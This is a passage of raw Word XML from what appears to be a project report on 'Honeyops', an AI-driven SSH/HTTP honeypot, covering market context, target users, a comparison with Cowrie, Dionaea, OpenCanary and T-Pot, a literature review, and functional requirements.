        <w:t xml:space="preserve">The global cybersecurity market is projected to reach $376 billion by 2029, with the deception technology segment expected to grow at a CAGR of 14.5%. The increasing sophistication of cyber attacks, the rise of ransomware-as-a-service, and the growing adoption of zero-trust architectures are driving demand for advanced threat intelligence solutions.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="target-users-and-stakeholders"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Target Users and Stakeholders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security Operations Centers (SOCs):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Require high-quality threat intelligence and real-time attacker monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Managed Security Service Providers (MSSPs):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Need scalable deception platforms for multiple clients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Academic Researchers:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Require high-fidelity attacker interaction data for cybersecurity research.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SMEs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Seek cost-effective security solutions without dedicated SOC teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Government and Military:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Need advanced threat intelligence for national security.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="competitive-analysis"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Competitive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Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dionaea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OpenCanary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T-Pot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Honeyops</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Interaction Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Response Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scripted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Static</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Static</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scripted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI-Generated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">State Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Full</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IOC Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Automated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ATT&amp;CK Mapping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Adaptive Behavior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Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Avg Session (min)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt;1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt;1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="feasibility-and-sustainability"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 Feasibility and Sustainability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The project is highly feasible as it leverages existing open-source technologies. The system operates efficiently on standard hardware (8GB RAM, 4 CPU cores) without requiring GPU acceleration. Long-term sustainability is ensured through modular architecture that allows component replacement and independent scaling.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="commercialization-opportunities"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5 Commercialization Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Managed honeypot-as-a-service offering for MSSPs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration with existing SIEM and SOAR platforms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise-tier dashboard with multi-tenant support</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Premium intelligence feeds and threat data export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consulting and deployment services</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="34" w:name="X6b69237c98c449d41086954ddbea36c95961e5a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 3: Literature Review and Needed Background</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="30" w:name="related-academic-work"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Related Academic Work</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="27" w:name="X7ac94031c35aff066483e0026e4df4acc14cb44"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.1 AI-Enhanced Honeypots for Advanced Cyber Deception</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gaddam (2025) presents a comprehensive framework for integrating AI into honeypot systems. The research demonstrates that AI-enhanced honeypots can significantly improve threat detection by adapting to attacker behavior in real-time. Key findings include a 40% increase in session duration and 60% improvement in unique IOC capture compared to traditional static honeypots.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="X5ba102a0504ec32053a9fe190090dde71e90395"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.2 AI-Driven Adaptive Honeypots for Dynamic Cyber Threats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kareem, Sachan, and Malviya (2024) explore AI-driven adaptive mechanisms for countering dynamic cyber threats. Their research emphasizes state persistence and contextual awareness, showing that adaptive honeypots maintain engagement with APT actors 3.5 times longer than traditional honeypots.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="mitre-attck-framework-integration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.3 MITRE ATT&amp;CK Framework Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Multiple studies explore integrating honeypot telemetry with the MITRE ATT&amp;CK framework. Research demonstrates that mapping attacker behaviors to ATT&amp;CK techniques provides actionable intelligence for SOC analysts and enables automated detection rule generation.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="existing-systems-and-market-solutions"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Existing Systems and Market Solutions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is a medium-to-high interaction SSH/Telnet honeypot. It captures detailed SSH interactions but uses scripted responses that sophisticated attackers can identify.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dionaea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is a low-interaction honeypot designed to trap malware. Its low-interaction model limits engagement and static emulation is easily fingerprinted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OpenCanary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is a lightweight daemon running canary services. It offers basic detection-focused capabilities with no deep interaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T-Pot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is a comprehensive platform combining multiple honeypots with centralized logging. It still relies on static underlying honeypots without AI-driven responses.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="comparative-analysis"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Comparative Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Existing solutions lack AI-driven response generation, persistent state management, automated IOC extraction, and comprehensive MITRE ATT&amp;CK mapping — all core features of our proposed system.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="identified-gap"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4 Identified Gap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Critical gaps identified: lack of contextual awareness, absence of adaptive intelligence, insufficient state management, limited threat intelligence integration, and poor analyst user experience. Honeyops directly addresses each gap through transformer-based AI, comprehensive sandbox environments, automated IOC extraction, MITRE mapping, and a modern SOC-grade dashboard.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="47" w:name="chapter-4-system-design"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 4: System Design</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="requirements-analysis"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Requirements Analysis</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="35" w:name="functional-requirements"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.1 Functional Requirements</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1056"/>
        <w:gridCol w:w="3432"/>
        <w:gridCol w:w="3432"/>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r>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSH Connection Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accept incoming SSH connections, capture authentication attempts, maintain concurrent sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HTTP Request Processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accept GET/POST requests on any route, parse headers and body, identify scanners</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Command Processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Forward inputs to AI Engine, generate contextually appropriate outputs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">State-Aware Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Access sandbox state before generating responses, maintain consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sandbox Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Maintain fake filesystem, simulate processes, generate logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IOC Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Extract IPs, domains, hashes, tool signatures from attacker inputs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Map observed behaviors to ATT&amp;CK techniques with confidence scores</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Live Session Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Display active sessions in real-time with WebSocket updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-9</w:t>
